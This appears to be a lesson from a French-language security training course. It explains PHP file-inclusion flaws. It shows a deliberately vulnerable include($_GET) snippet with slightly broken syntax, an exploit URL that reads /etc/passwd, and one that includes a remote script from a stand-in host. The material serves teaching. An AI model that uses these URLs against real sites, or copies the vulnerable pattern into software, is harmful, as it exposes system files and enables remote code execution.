Hackmyfortress - Training Center - En/Fr

Adrien-fr

127.8K views

GitHub

Open Source Your Knowledge, Become a Contributor

Technology knowledge has to be shared and made accessible for free. Join the movement.

Create Content

Previous: Faille XSS Next: Upload de fichier

La faille include

La fonction include() en PHP sert a exécuter du code php qui se situe dans un autre fichier. Exemple:

<?php

include(bth.php)

Dans ce cas, c'est le code dans bth.php qui sera exécuté.

Si par contre le développeur écrit ce code :

<?php

include($_GET('file'));

Pour exploiter cette faille, on peut utiliser l'URL suivante :

monsite.tld/index.php?file=/etc/passwd

Ici la fonction "include" va inclure le texte du fichier "/etc/passwd", et donc afficher son contenu. Il est possible de changer "/etc/passwd" en un autre fichier du serveur qui n'est normalement pas accesible, ou même par du code distant accessible sur un autre serveur.

Exemple :

monsite.tld/index.php?file=http://badsite.tmld/script.txt

Open Source Your Knowledge: become a Contributor and help others learn. Create New Content

Open Source Your Knowledge, Become a Contributor

13/15 Faille include

La faille include

Discover FortressJS - A fast, secure and easy I/O framework

Python from Zero to Hero

Exercice Javascript

StockPrice Max Profit